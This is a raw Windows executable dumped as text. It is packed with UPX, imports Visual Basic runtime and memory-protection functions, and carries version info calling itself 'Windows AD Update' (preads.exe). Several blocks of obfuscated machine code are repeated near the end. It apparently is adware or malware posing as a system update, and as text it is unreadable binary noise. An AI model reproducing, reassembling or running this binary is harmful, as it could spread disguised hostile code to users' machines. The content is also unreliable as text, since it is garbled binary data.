MZ�       ��  �       @                                   �   � �	�!�L�!This program canno��f|j�[�5>��YߓyZ�W�W��G3�}��^�&FlK��yNM��"�)
���U9�=�Y�$�jV =;}���                PE  L �zF        �   @      �  P�   �   �    @                                                             8�  (    �  �                                                                                                          ��I'̀ �                           `c+��ƒ� @   �   2                 @  @���?��3 0   �   ,   6              @  @                                                                                                                                                                                                                                                                                                                                                                                                                                           3.03 UPX!	�˥�{�w)�  P0   �  & �� � \  + ,�фh�yCML��|6luhGS/����֌�L5V�&�_�C4>_����zNR���d
7d	�&���?*������|�X� jh|�uլO Ax�Q܂�dk\h���Q�jk�h���ق�JHh�j9H�*�,4My|��^��;xlr�L�h�_&���o{km�����fT���dh����*��ի��iR�`N�E�^6��u��_&�h��w���AR��ָ_�*!�����&�i(h�V�*�$��$e�bG|��lm5h�e��{\]��6�th�X�h{x�H�]6�h��h�_���eL^-�S#�<2L��<�2fs~l}��0]xqhC].�m�ͭ&�_�|NP"�f#�_Ċ�m2�"��g�L�&�^��sH�h��w�2]!$�p�]&���P��h����,�hD����k�L!hkPr�Y����{}+ 8]&�_�h��y���2�ʻ񎢺�h�^�X��ا����2]&�h=�ۮ��&�O������l�d��h���rٳ�w�h���*���R�Gla�v4�������ٮ2]����`�<mm7��L��̈́��x���h�s��h� ��,�N�{+n zCW�H��{zv_{�w���zsz�����{z#{g{�LHHc�z4�Y��{�z�����?{[{�z�LH�zO{G���PznW{zo{,--�z�w{L�W3�ly�w��z�{ˤ��RC{�{�z�z�--�H�z�S----�c7Srr�&��/�RY�w�z�׷{���󛴢����y*;-�HH��z����&B{�z���R�{oz;��M���z�{{�r���7/{�W��w'{���H��zn+{z�KW�IHGm���R]�,s{'z��?�����{8�ؠ�r�|�{��3Jo-��i� L[#o��lNl�Dq� �on	��� ֔N7�� K�X�'
*����"�V��Zoޔ���һ��)T(��g��W�cg�~��3'�s�J̡PLQѮ��$�X?�z�g ���]�h�l�nh� c�Ӗnd8
fj9�}���r�)F�B5ʦ�n�j�l&��WzCh{K}$
tc�t��6Ӫ��k"���h��З��M���L ��;&ܠ���h������d����B ��B�A�h�ˆǠ��D�<@ �����G�����F ����ˆ���7���F|Edh2)D �����6ӂ�7��h�ܨX ��D\hD:_�h���^��6� ��] ����l�h���Ƞ��>5��S����h��l�R$�h��Q �ڔ��Ե�P �Ù�W �ޟ�U �T܆Ma˷��*d�h��ж]�)�/��-|�h�ܰ�����!��&��; ��: ��8`��4�h��?4
 ��\����d�h��kǹ ���`�`��,��t�� ����K���崥�k��q@�}j �j�4.B$4&X44$TCd��R,+CMQ-%:-z!dCE����_FDW'=3MK;qCZOuJYYe)?6T���VLtz`ceP><{9@yo�R�� 4Uwn~���[4/vml4}sH]*d74((��aiUGrAAt{SbK4d|^���E1240Rhjfcp\d{188#���NxI[e1dz1 "Tvdu��n]o�22���e��[t�[l��Kh����ꔔ���wb�j�"�j""�j0������h�ԣh���n����nݔf*w������tO-��]��Z^W�jh#y� 4Eg-h�o� � 
Y�{��JZml�q�'HL)�=)^J�tAfa �R�bo�O@��뾍� ĉ^��Mh�0�3"�h���|��f��K*/K>
]+��	Y��XQ�B��7� �U�`+A�|S7q�!IxH�d %u�Il�j�6�ym`��t1��}�|�P@hj�M�f�W{@����3sLK|#H�'؇5hq�����+H+z}u�OoP�i��$�{5�j�$
J��w1��d�����oet�e �b�J�j'?�|��)�
K
K	��D��Ki/$8K�EffaO �fU�lJ��$�h�(��V��l_*�ւ ��p%��m�dt�|.��\�۵,d"9x�J���;.'joҋ_A�7E�� dj`jm{b�jpbsG�b�`hOdr�o?o�a��v�h
{l��Vg�$\+V�]��A�j�����CS��||l�����7 �Ql����!� B[jY Űî #�|;l�}�rnz#Z�)�F"��J��ѦXt|nxB����rB�/�.��	B�&�QGL�`m�!lK���l�.[mr���/�?gY��*�(G�*%e�)�+�g�*�wr��K�+G�KLl�T�3*%eYo�Ug�K�V�G���W�;KLlrc�PmRR�G�Q�'�*c�R���gS�S�Llr7g�\RR�KG�]��*mw�^�*%eY/�_��w��X��K�O�Y��*mr/ �Z%eY�G�[��*/�DߏK�g�ELlr�[�F�RR�K+�G�

m��۔\K��d+��*�#�z������D2i�ih�` �dة���ioI �@@�э�jl��M���|;HD�.|�pG�LPDo}��j ��(�� l*;�(y�"l�H���2�&۔J`�f��t�}���O)�CO���U�s[�f\�)�d�V����{�S�@X�(Q7��l�;�-7&C�y �d�=�
K��7cRSo]E$')g)b	|�@mbЅ�b�dh��()v��}�#�H�l��anio`g�`�d�oBGiLC��F��_laK�jno]���|j� �jn�XXcPc`CNC{{�w��kK�4d4G,���pG4_ib~�j�|g�Wf8�XYE����\�8p?�lǈ�7�2�����g`�i���� sK��-��f(~�)?m�7�' $��Jҏ+�ӳ�'�(t;"*(NlY�����`l���#�K�1��_F(׿!5�+F�za��jtEzd#�T�*$>*<R���\�0��v3#E� 9�w�7a� ���7K����`�e��,KEJDR���[E\{iP NlY�����g�z�&��{c@� �#MK ߣ�
�y-IM�-~  Do߇��jg���4+e};%$K�''{s���7s�,�0���2/ʀ�e��*$�wONr� �dr���8~,�C��h[�f�f'e��_[׏+%_W/[�zY�8$�NlY+#��&�g� NlY��'?p�}��U?+% sZ3S�׏GZ/*��>@,+ER�eǪ��,�ER�*�b#gl���w�(� RKL�Y;SY��hR��/|��vD�'
��>���v}<K�&<����7�b�+e��,�D eۏ8��e�|��X��NDR[��OX�����R���z�$X�j��h�`�.e��Xҏ+%���N��J~�g��\$��r@��_��a���(
.�_w��
�_$��UZO�xH�_�%s&����%�� QNDRo���_�)	`! Nl��(^쟗�uƏ�_x&L�P�!
�,_^, ��w��c�/^�1�ڜ.�;DR�*�,g[�5F����nP�(�sO5KK�^8"�?�0e��
�c] OG�7� w]l'��8r��?����"4?]��hr[SE�t�k

}��}�k_6��a�ߣ�K�W/8�J��]z?���5X s\#�)�;G\�}�0�=�]e���$\�?7}@+\��t 3�P�\NDR��\Q��	��*������2@gSV;
cY~g�#�e�$/�s� 7`T�_�b�a�O���g�D�8��J�)�(8R��&�Z@��RND�S�+���/*(GR����׏�SR�ms�t(�Jҏ+����b"�(���g�׫��b({d��e�D����[1� cQc+�u�D+Q(��Jҏ�'n���/�> �&ه�O�<�Q���g���M,[)\�M�g]cL�(��n����e��4(KP�����+PD����h*,�Od�o�R�g*�s(1���� ��jRc�{�P`sN(;���+mP�,wuY��cW<+Wҏ+%KC;,�g@��,��w�KG_�����Wk<,�� eS+�?�xqzkk#Kd�T�sV /�� 'ݔV8�u�Jy�Dh0�?1VfIw�K�4;3K[O��et��
P%���w���V7�F��V�eW�C�0�gU���KUmRI*,3Jҏ+�y(�r���}p�:~8�hR�
�U��O=����U^�}'�,�U׏+%��oT[*��,����b�4	
8�"Y8�hR�WT��˻�o�3T=)g�vE�.S,�ϡ����T�w��H�(�5K��ӏT�hb���=��Z�w+,�y��Q��G+�N�gk �+�w�rȣ����+��e�D ۿ���; L��Q�>�.k>9e��'/��2��ڐ2�Xc*؋z@��w*�^���/��( ��`?8� e��p�qm$���T'�+m� �����e�<�ʸ�hU,o�n� mg�lk��V�a,[)� �~�{�sܻIxY)cThr�|�Tw���O�he;<h9c<��7@<h 0ӢNlYC[�݈lg|@�8i�1��0$DR��(_WG(���o|g&(g]�&��(+(��#erpp#(. ,�ҏ+m'?�{ �JbP}T��p�� ��+��$/83�0r�g/ (m�u��/6,/Jҏ+?�,�e%. ,�hr�`$��z:���� ! ��NlY����gd�"�����K.��I/i[.ug]c���,�n���gY
�k,��(��ëS�.���j��@4h[_SW���+/#7�����u0^�х`�b`hn��?� TAXHoDy�"M�ljx	$ ]�{�K@R3c�9LG2}h=�,F�p�1�F?h8 2f���?�&(t��,"F(�lc)��N7~���h6Jtv4�x �OLO<���q�@ $���Q DlD�\�*h`E$k���H6�nd �`�EI�iXQ��"�#8nP���z�bk�&�%p�M�>]
��Hz4f�{�Vh�t`��[�u|Ϸ�PH\(P���<:|k�G��>ȩc�P	|�4��K'Y4_6\p~$�a	�@|��6=z&P���px<�.��&r8=��s4ǀv.
�J$K[�Z��H�#Z��u�8
VNH�-sy�Ok-k��Ns�K��r� �VT|%2,���|����"p{��SW�gj���L/H����*]E/'5tNq�+:d�ὲ=`-���'7v'D$	|�
��ǹxH"�+(ie&�
�)�4Mp� 7C�>�b���8�y�mYt\thP�d$dd��L"_z �P3���0p�	���i�^wǾ*jH#K�N�r �|q��
\�7�^��k�ShY�[�Q��e)zzʊ��O�
�v4����hX�K�_KH|q����Gr�KسO&j�&.hp��V�v\��vIp(��ϳ32%��͇�w�to���hM����N��P���L<k��ٜjz��P^�����9N= �kom�PB/�'���|�_6,-[��&/�-C�_�MRRl]*f3\m�/b'K$�F[�, $jHB#
$/� DJF2�&�PH�srE(w�#�&�^�b`y��	�#K�^�!�O��Q���ܲ[~XN Ze����:�6\��vn2
 �AY�.�m�m�a�Kd����p$jJ�y�H�$��-�MD
Ѧ�j8#j"jQ�G��Qp�POl�Ic�|���ZC�z��ٲK��|Y'D�����2���c�^��dXd5���N��4w.�%�<���&���Zjq-�2g�(8k"w�N���N �\���ue�9� n'�e��`�J��v��wd��+xc:;+t.ڢ	)$t4�33�	�t*P,L5#k�������tz�;�p�0l6do#����`f��K^+#]/��g��G�*�[Nc�[L�˰�.h�6/�D���wh�l�b�?�EL� ��2�P�PN�	djB6Lw̲|)HXǸkm�Zz����@XP $� =L#X,v8��V�?h&Kͦ�k%�9ln?�"q��(.n v8�����02<��K� PdJdu�	ƀ��Qgi"�l����\�J0���M(�>?-"'�O~`>��&0v�)	-y����p3�$"?v*Z.�
i�|K&"(I�v��f�<��{O]0R��"	2��	�+��X"�@#�"�o�"�p�{q�J�*U- -+X#��F�tdM��&���P��#Q-K8��n�J�KbQ�r�~X g3�TB�\�h��@�8�� Kv$���"
:�sք?n28,�;Xd�b1�|�P��u��- 8�D���*�b$��V�(d|//<,��k'l*fJ������Ej`K��~�2�"֌�NP��4^Eb���lHkk^C �li�$�)�����>q(Z��
C&�K��^BJ~ �0�X<%  ǌU��$H��'����@3�?\�V�_��D ���';x�s�����{J�JZ$�J��j�OnG�bb@W��/����9)e%G�D�n|#h@d�Q�8,���a�N'���)%�fC]�%L�aebP? ��m�/
-"_`/�O|B�(K�k-,�|^K"[h���V�O,Q@�*;M`�xo7)�d�h�,�)�+�X���O�0�"Y�p/`��myȸ��l�;t�ilnLoDK������':-��!�pe�MsG����N�n� �$�`�ن�LJm�i}o���2�*v��u{l8	_�D�*���Nk�dH}M�۰'u)��í� Dxm�E�BWt �쁨|@+���!-��(X��mPSP/l`S \#f#d� >���s��]:���Nv��H���l����8=<���.�{yO�.c�j�.�cO��ݕlc|�Ee��c����;oz�jm�j/c���fh`1@o��pnN+��V��������n K~�A+H�����~<�M��l��l���mA[-�.�;N����nY�a��&�lBlيARc{����Z�T�b�-�'K8a`���g�nf�X�T|^7�+(�}�������9�;,����ZeB��r���,Yq�=�gg���u��K� �A;��!�"�h�s?
D����E�7	�&c�*_N�򅴢Fhs;�{dj���<q/�_$g#\��dԫ)�{�lJl�zy0r�d��hx�׌�H�x=o# ���~\b���#�v#�c�5��lw�G#���D��|�y�wY�J�����I���ׁ<c�'c�h�;GnswY��}�|����2��~�Ow��Di
i�mg's�*�@��7r�iR�����G�p�+p��q*�Ч s$�#��#�� �����5c��Bp� )cr��+%�w�w" "m�'zvo!�Ng!�?��HS"j�H��u �~���t�V�ݪ��lps�/6�Їx�a`�b��]�n�;�;z��L�r�;��ҁ���K�*E2v����K���'>���KH���;�����;;-�����nl���*Mr�﯏�*�߯�� -�������������*���3��*-�3��*Ek�9�-�+��*#�D�oI�}��3Ot�Sc��R���U���K0�2���p�}�;S7�mJ`Y�	2g.�O�M��"��J�i���c�A�
`��a��K�{�g�C!bo�|�M�s�bq�g�Z:{��dY��w��wW� -�!����3$�n�����h�叕�S�)ߣ-��b�G��s��G����� �S������W�_�_0*x3���+ݸVcMgoxLlY���?�/3P_O�)�mGL�@�#=\���Э�إ�TbeC���c�NKcoi{t{�a�w�}|]J?⨌�g�fl��� "H�Ml_�j�K&��f`50���c�zi3 �R%�y*p+Eo�58��P�-v�sߞg6]S`�a1�?V�J0z�q�o0�l�<ra?;`L�l��N[�.�A�{��
/S���S@b6�I6'n9%]os�7�߶]��� M7)��h2�K�q#�5=h#l�� DY*c4����]c�sW �Vc�3i�X�LZe�"��(��A3
�O'�L3tۜ5j��p���*y�z[�jd�2y�J�/�ra�;`�!�Ig �+fYAr*jWNh�y�ZqGC/�e�'�gK�A7��l��3�}��K�' ��ޡh�g�_&���lK ��CX�RG`���ʨ�.�@��RA#'5q�wSx��[��-]/�ucg����O]V�Yn1ScZ����*˷��T�T/�s��
!X��ӇIgn`��{ec�f-Һ_��igc���~��_�Tx9+c� n�_��`���So3�g�|g~
o.ǌs��o�{��r��^/�{������<e
�	l2a� n#m��d����G������ �{�i�@p�}�8_KV�[��B�V�f|� ]s껚u�IL���s�`�@1#�h�s(a� �׭��/�!�),Y��VKF�[&�~�r�s��)o�_H&Wl��)O��� o9�a��^�Oqb���h|,�Yr�Nnuv�
�0חK�{٨���χ�O`�ƫO��-87?V��# '�ID�_��J_N@�mp��_V/{gny�xa��H%0G|m�d�wr2A��n^����d��giB~i�W��oAla�R���o1z>��*ݸ�}M�v����s,�?��p��y�h�}�F�x��zPYd��Y��/�GO��眰>FJs�++� ��.b�c�Giwkn�Z,+��b��!���b��mYa-��n]��*s�L��_�B�����q�l��'��p�q`rj&��@�����s�#<{	�-�rSr�s���_Nh���X�^v86db�"��o�c{=�PLu�8�h����/������(Y��/3���kg$��<�DZ�ۑl��[����$�2o|�b͊*��-.n͕�59�>�7bV�+qN����"�/��c� �co[�@��8�L��j��)7�mb](/xb%��r��b��J�ùG��] lcY3��;�
H# Z,3�wy��5#أ��pX)�`}��o��W�IK�``e�"g���u�B�b(/�+����+�K�~�|}�w�lm���W>�WW�|-3Sn�+(W>Ss�bms�$��_ذ��L���}W:��s#|Ż�b���Cs���V;�y M-�ĳ�A]b:п�Pc��c;�����b�7%�U�b�^ni{��(m��`�g{0�:2{�e�d�RO�++��3��QhJv2���N�QN ~��gV�f����" ��c�F2]{�M�X��a{Rlc|od��^L�S�j��sٚCL�
]M���.���"]�zo#�I�S�Cv�G��ka�
�Ow��G'Lc)�f��l�"���c �Ȭ�LM�r� �{o�N����{"p��z>[P�T�jX�Ad�����2�ێEv?��sw~���L��z)rf�c��h��cj��cR-�pW/���d��@�l��G{9������"�زIԓO��:sYY���LL`Vv;+�J`c��6�e����D�e�;���m�	6������]���y��;��eGsg�5l�&8,�`�A��b�E��b#�,��#�+Ea��+E�`�+E#�gE#���f#�+���YEeXG� �R�/MrR�����"�(%[��"-S�����Fp��� ���};�x+w���[LK�����{ 0���|�!�pB+1݇{3�~omRcO��h� ����Jh}l'9����
�ے�JlY��\�b���Qݏ�yV�|�F�+�v�O�xq�g�KK�G`^io����!W��;^J��{`@"<�,{�z*|��K��f� 5y��5v{p9���~uG~�;�i�p�o�Qw�!-ѨD�Lx�Ar��~�h��8=E��r)}Iv?+q�J|���� ��h
�~�(D��FB.�#�}{g�A�k�S)g�g�H!m�2�x��>c=ag��#zgG����u`ay�C�wO�Kc8����w���h �Y���� Oi�w`d�!�����e��d�z�p��P�m��=zز�{�l�*@�{L$.ݝT�����p�hd�|(`�p�H��Ijj� Ha����~D�bh��j\Cx7?'Y�Oy�K�b0n��)R��/��/`�JSߴ�*�h�r�_g�o�Dg_3D���O��F�"�j��g�Zek��+eYrc�O?Y��5����\r�c�2C})/Ӎ#h��?��;?����	�Ss�g`H)	�e�7��J�u[r��l�ro{�9oOxK�|Kh�zZ��j� � y�W)e�>{> >vJl�x�#+Y��Y�*���Q�7�Ǐ���~��8t�{6��lz�'�����n|����ëq�|>@7�#S�4L�j�oc�A)l#��cӵXbL!p���K �mw)�њ~�>�_�hg�}MSJ�u�Z1u/�N{�����uף#�f�|�� �{��s�K=��n To��}
���*r�-o�Z*YrR�zK'q�w#��)	CXv��`Ry�׿��rrv�u� � ���tsc�bK�I��mh'a5� ʏ��H.o<�@�p��<a�mk#�\��D��Y&o��vy����MT ����L���q�(�wC�[��"B���;�9�_ EA:GY�*�K M�nJs@�`G�l�{8{ b{<�I4{��6Q�Fһ�Eb�
k�8����Pg�D�ڃY�; ǚR[5cm���Lx�l��X�G�e5Kz`@XX�.��Xi�)j_Dw�<�;�{�sP�/`C�%�;L��<��퇴�8⏷w3M�H��K�@��"��K�e+A=YI�!ŏ��s�¨_�n�C)����Te�_gٳ]c1�U�mo\wNS��)]_3`3oHl�
���W� V[i�O�3�!3�8�+�.e+�^s��M%��`����,˯�'���b�;� b� ��*��E'�)g2+p-
�/�����>M.Ǭ,Im�-�-#ѣ-&k�u"(�)-�!O)��?,�b�ۋ��B��-�" �<{�ww��wJl���'�TG�"�!7Te�@
�zcRG_�r���S�����|���c-Z�>8o�7Y��������ϵ����g�B�C|U*w=��&�?�ۋY	�Z�����%mHH;h$"�jK��J����wY�׫�)�<mO5hR�bP; ��J�c:�?2"��o�2Ko�c�����w�2"�~J�7w�3��7�&!��/�_y3r�
w�"�`�Y"�;?�Oo89=���j0i����j�!E`�z%��*�l��)[�K�����jÂ� *m�r�����n�{ ��Ca���q�jS��j�`(�pkl
4
@��t_S^�h@�j(j��h�zj(���f(Q�+�|j�j�-mj|�oiՖ4]�ij�p��oi�ni�sZ#��o��jYc�[j�i���(
�j�y�Bij8i�j�S�j�X?j��+�:%v0ytz9$L���2&;Z];fp�d{�/^
�j��.�cB�`�H��i&�F�I�k,k��N:&�et.=.%?48"�)�% 4�*NNG�ì3e2?�%�z�:��e2?Xq��{*�5j/l-
��3�Ū�
���/^9�v��]s�
�1�K
��M�V/�;�F�"?P�sG={�u��0}����(}j��5͊Jg��4\P�ix�;�^"?X4�jH��.Oj�yM?F�$`�]- r6�i�����r�j�b�vWQ)�O7�iSY��n|Y�{oV�۸%_jGH�T4��f)�i()�ٰpj-��:h�Y�U�I�aj�~�1�V*��P¨�u�it}_G�G0zKJ�_XO
I�^eHwJ0p�O��/�?��)b�CJF.i>v��h $�#��t�Xq ��w�� n� ��A��ij i��hC�?�ë  �c[i�n�۴giLE�mPy5���󲥛2�E�`�e��6��h +�E���ب�L� ��&+x����         y�hH7q���иj�1���^寿��h�   #�Y������d�9�����1��"���Pt d�7�1��Td��f�� ����hf��c�m-蛔�j�l�u腗z�z�j�l�u腗z�z�K*j�l�u腗z�z�j��b�u腗z���i� ����j�D薗d�i)�l,"�������i�o�l�o�o�j��'���5�ғi  �l,G�Wj��Ti��l�4o��c��{�B�뀃j��l�n㳉��� �  �lb�.�4o��[˃  j�;�c����  ��l,c���ld�l,;,�<#��>����  b�l�h�o������  �ŏ�  �� ���� {  ;?o8<����j  �K�C3;?;8<��3
�/O� R�����S��                           ~O�H%         (  �   h  �   �  �    ~O�H%      1u  @  �    ~O�H%          X   ��  h  �          ~O�H%         �  �    ~O�H%          �   X�     �          ~O�H%         �  �    ~O�H%      	  �   p�  0  �      4�  (                                    �f ͎$ kI% ��% �% �& �& ޖ' �' nP( ��( ڋ( ��( �( �u) �) ��* �* �* �* �W+ �+ �+ �, �- �- ݙ- �- �- �- �. �. YB/ �/ �/ �1 �1 �1 �~3 �3 oQ4 ̉4 �4 ��5 ϊ6 �6 �6 �6 �6 �6 qU7 ��8 �8 �8 �9 �9 �: �: ޔ; ��; �< ��< ��> �{? �y@ �A ��A ��A ��B ϔD �F �F ��F ��J �M ݳP ��Q ܥS �S јT �a ߲d �f ��f ��k ��m ��v ط} �ʉ �ʊ Ҽ� �ڎ �Α �ד                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _E)O____________M3__O?(((((_____G@__(&:FNQF((___J@_(.4-/<LVX?(__P(1$!22BT]?___='___;UW?__R+ (((((((((___>?____D#6A?__\_CC
__,**?___\_C8	 25?____ZY_[97?_____ZZSSH%"0?_Z______ZZZKI??__Z__________ZY___Z____________YYZ__��e�0u�0�� �� ����	��I�II�[������������ª�A������II �          h  1u��  04   V S _ V E R S I O N _ I N F O     ���      �      �                             D     V a r F i l e I n f o     $    T r a n s l a t i o n     	��   S t r i n g F i l e I n f o   l   0 4 0 9 0 4 B 0   0   C o m p a n y N a m e     1 2 2 1 4 2 2   H &  P r o d u c t N a m e     W i n d o w s   A D   U p d a t e       4   F i l e V e r s i o n     5 . 0 0 . 0 1 7 8   8   P r o d u c t V e r s i o n   5 . 0 0 . 0 1 7 8   0   I n t e r n a l N a m e   p r e a d s     @   O r i g i n a l F i l e n a m e   p r e a d s . e x e                  �  ��              �  ��                      �  (�  8�  H�  V�  d�      E �    KERNEL32.DLL MSVBVM60.DLL   LoadLibraryA  GetProcAddress  VirtualProtect  VirtualAlloc  VirtualFree   ExitProcess                                                                                                                                                                                               h�      `�          v�  0�                      h�      � DeleteFileA kernel32.dll              ��`h  ;�Yy�����`� �@ ���1�������tz���k���t�SC[fɐ
ɛA�� �@ u�a���Uf��2]Vj�^^f�� �T^H@��   ��`��>��   ������'	���'	
�, �� !ׄ�{ �h �_#��Y�� ����V�� ^������OG�� �� h�����Z�� ����zQIY#� �������Q���@69t690t����    �Hf�ۀ8�u��f�� ��������8�u�VF^H�8�t	f�ư�EM���ˠ�А
��ćć�f����
�h:a5�x�Y���8��[�1����d����    ���xA�h���<7��lA�hR�×Z�:g�g���G�8<�W�}��R^f����Єҁ�    ������ u���htt������R
Ґ#�tW���_�� �    ��:��h��q�Z����qj
���$IA��]�啁�]��h�����$�Ѓ� h    X�������Ph    �� h    �����ht  ��   , �   ������    t|f=z ��"�t�����v�����`�����u"����     ��|  #���`�L$�̐d�    �Z��^
ې#�t�x:́�    ����    �#��h�+�A�������1�W 1$�1כ���    ���@�� ��    ���hs-�����-14$EM��   �������R�� �׉��⠁�   ����(@Hh^����� ^�
��a/KSh��9��4$�$Uf��#�t�� �    �� ��������H@R�$��@h+�:�Y;�hk�:�1$����%�����$�j���4$��6�\�"���\�b�h��S
ۉ$�� ����x h���e�X��*Kr�j�����$��S�ˀ�,$#�FN�   �������<� ��    �������   �8h��
�Y����>��h��ڸ#���$�� �U�����}"�S��[W���_������    �ށ������� �>f���S   � �+ �� ��<覔�{�������m-�l,j�l�u腗z���j   j�l�u腗z�z�j��b�u腗z��Z����Z�P�@ �   �2�7���   ��   ���ug�g��f�� �� ���    ��`�   #��V��^�� �f�, �    �-�@ ���}   R�PRQV�� Q�Y�L$�~����ΐf�� ��������P��sX��   �U��]x���L   f����������� ����)   f��Ё�   �#�<�CK�| �:��#���������    ���R���
�f�� �qS�[Q�W�f��q P���t$$�_1��f�� PyQIY#ҋL$ W���Q���`Z�f�� ��    ���    ��U���A#�<T�����t
Ҁ9 u���‛1�t"X��@������P�������Ѹ    ���� �뵨�^�f�� �D$�f�� ����    f��f���� ���D$ ��ț^�
ɋ8^�u���ׁ�    ��YZ^X� VQRP��*���� ���sF:Ջ����֔;d�fɋQ����rOG��​x�� XZY^�QRWPV������1�����{�1�  @ ����S_�������������� �B����  RBZRf��P�
��r, �sY�:��؁�D   �8���u
��������>�ސ��6   �$�� Xϐ�ށ�e   �>W<LP�CBJ������� �ށ�y   ���"�������:�����t   �@��ҁ�@��R��u�� ��   u�������ށ������f��R�#�CyP�{'��׉ށ������K6ț���CY�����CY��Ce���ށ�e   ��s��� ZZ����������`_ZXY^�QRWPV������1�����{�1�  @ ����S_�������������� �B����  RBZRf��P�
��r, �sY�:��؁�D   �8���u
��������>�ސ��6   �$�� Xϐ�ށ�e   �>W<LP�CBJ������� �ށ�y   ���"�������:�����t   �@��ҁ�@��R��u�� ��   u�������ށ������f��R�#�CyP�{'��׉ށ������K6ț���CY�����CY��Ce���ށ�e   ��s��� ZZ����������`_ZXY^��`h  ;�Yy�����`� �@ ���1�������tz���k���t�SC[fɐ
ɛA�� �@ u�a�VQRP��*���� ���sF:Ջ����֔;d�fɋQ����rOG��​x�� XZY^�PRQV�� Q�Y�L$�~����ΐf�� ��������P��sX��   �U��]x���L   f����������� ����)   f��Ё�   �#�<�CK�| �:��#���������    ���R���
�f�� �qS�[Q�W�f��q P���t$$�_1��f�� PyQIY#ҋL$ W���Q���`Z�f�� ��    ���    ��U���A#�<T�����t
Ҁ9 u���‛1�t"X��@������P�������Ѹ    ���� �뵨�^�f�� �D$�f�� ����    f��f���� ���D$ ��ț^�
ɋ8^�u���ׁ�    ��YZ^X� ��Uf��2]Vj�^^f�� �T^H@��   ��`��>��   ������'	���'	
�, �� !ׄ�{ �h �_#��Y�� ����V�� ^������OG�� �� h�����Z�� ����zQIY#� �������Q���@69t690t����    �Hf�ۀ8�u��f�� ��������8�u�VF^H�8�t	f�ư�EM���ˠ�А
��ćć�f����
�h:a5�x�Y���8��[�1����d����    ���xA�h���<7��lA�hR�×Z�:g�g���G�8<�W�}��R^f����Єҁ�    ������ u���htt������R
Ґ#�tW���_�� �    ��:��h��q�Z����qj
���$IA��]�啁�]��h�����$�Ѓ� h    X�������Ph    �� h    �����ht  ��   , �   ������    t|f=z ��"�t�����v�����`�����u"����     ��|  #���`�L$�̐d�    �Z��^
ې#�t�x:́�    ����    �#��h�+�A�������1�W 1$�1כ���    ���@�� ��    ���hs-�����-14$EM��   �������R�� �׉��⠁�   ����(@Hh^����� ^�
��a/KSh��9��4$�$Uf��#�t�� �    �� ��������H@R�$��@h+�:�Y;�hk�:�1$����%�����$�j���4$��6�\�"���\�b�h��S
ۉ$�� ����x h���e�X��*Kr�j�����$��S�ˀ�,$#�FN�   �������<� ��    �������   �8h��
�Y����>��h��ڸ#���$�� �U�����}"�S��[W���_������    �ށ������� �>f���S   � �+ �� ��<覔�{�������m-�l,j�l�u腗z���j   j�l�u腗z�z�j��b�u腗z��Z����Z�P�@ �   �2�7���   ��   ���ug�g��f�� �� ���    ��`�   #��V��^�� �f�, �    �-�@ ���}   R�QRWPV������1�����{�1�  @ ����S_�������������� �B����  RBZRf��P�
��r, �sY�:��؁�D   �8���u
��������>�ސ��6   �$�� Xϐ�ށ�e   �>W<LP�CBJ������� �ށ�y   ���"�������:�����t   �@��ҁ�@��R��u�� ��   u�������ށ������f��R�#�CyP�{'��׉ށ������K6ț���CY�����CY��Ce���ށ�e   ��s��� ZZ����������`_ZXY^�VQRP��*���� ���sF:Ջ����֔;d�fɋQ����rOG��​x�� XZY^���Uf��2]Vj�^^f�� �T^H@��   ��`��>��   ������'	���'	
�, �� !ׄ�{ �h �_#��Y�� ����V�� ^������OG�� �� h�����Z�� ����zQIY#� �������Q���@69t690t����    �Hf�ۀ8�u��f�� ��������8�u�VF^H�8�t	f�ư�EM���ˠ�А
��ćć�f����
�h:a5�x�Y���8��[�1����d����    ���xA�h���<7��lA�hR�×Z�:g�g���G�8<�W�}��R^f����Єҁ�    ������ u���htt������R
Ґ#�tW���_�� �    ��:��h��q�Z����qj
���$IA��]�啁�]��h�����$�Ѓ� h    X�������Ph    �� h    �����ht  ��   , �   ������    t|f=z ��"�t�����v�����`�����u"����     ��|  #���`�L$�̐d�    �Z��^
ې#�t�x:́�    ����    �#��h�+�A�������1�W 1$�1כ���    ���@�� ��    ���hs-�����-14$EM��   �������R�� �׉��⠁�   ����(@Hh^����� ^�
��a/KSh��9��4$�$Uf��#�t�� �    �� ��������H@R�$��@h+�:�Y;�hk�:�1$����%�����$�j���4$��6�\�"���\�b�h��S
ۉ$�� ����x h���e�X��*Kr�j�����$��S�ˀ�,$#�FN�   �������<� ��    �������   �8h��
�Y����>��h��ڸ#���$�� �U�����}"�S��[W���_������    �ށ������� �>f���S   � �+ �� ��<覔�{�������m-�l,j�l�u腗z���j   j�l�u腗z�z�j��b�u腗z��Z����Z�P�@ �   �2�7���   ��   ���ug�g��f�� �� ���    ��`�   #��V��^�� �f�, �    �-�@ ���}   R��`h  ;�Yy�����`� �@ ���1�������tz���k���t�SC[fɐ
ɛA�� �@ u�a�PRQV�� Q�Y�L$�~����ΐf�� ��������P��sX��   �U��]x���L   f����������� ����)   f��Ё�   �#�<�CK�| �:��#���������    ���R���
�f�� �qS�[Q�W�f��q P���t$$�_1��f�� PyQIY#ҋL$ W���Q���`Z�f�� ��    ���    ��U���A#�<T�����t
Ҁ9 u���‛1�t"X��@������P�������Ѹ    ���� �뵨�^�f�� �D$�f�� ����    f��f���� ���D$ ��ț^�
ɋ8^�u���ׁ�    ��YZ^X� PRQV�� Q�Y�L$�~����ΐf�� ��������P��sX��   �U��]x���L   f����������� ����)   f��Ё�   �#�<�CK�| �:��#���������    ���R���
�f�� �qS�[Q�W�f��q P���t$$�_1��f�� PyQIY#ҋL$ W���Q���`Z�f�� ��    ���    ��U���A#�<T�����t
Ҁ9 u���‛1�t"X��@������P�������Ѹ    ���� �뵨�^�f�� �D$�f�� ����    f��f���� ���D$ ��ț^�
ɋ8^�u���ׁ�    ��YZ^X� QRWPV������1�����{�1�  @ ����S_�������������� �B����  RBZRf��P�
��r, �sY�:��؁�D   �8���u
��������>�ސ��6   �$�� Xϐ�ށ�e   �>W<LP�CBJ������� �ށ�y   ���"�������:�����t   �@��ҁ�@��R��u�� ��   u�������ށ������f��R�#�CyP�{'��׉ށ������K6ț���CY�����CY��Ce���ށ�e   ��s��� ZZ����������`_ZXY^��`h  ;�Yy�����`� �@ ���1�������tz���k���t�SC[fɐ
ɛA�� �@ u�a���Uf��2]Vj�^^f�� �T^H@��   ��`��>��   ������'	���'	
�, �� !ׄ�{ �h �_#��Y�� ����V�� ^������OG�� �� h�����Z�� ����zQIY#� �������Q���@69t690t����    �Hf�ۀ8�u��f�� ��������8�u�VF^H�8�t	f�ư�EM���ˠ�А
��ćć�f����
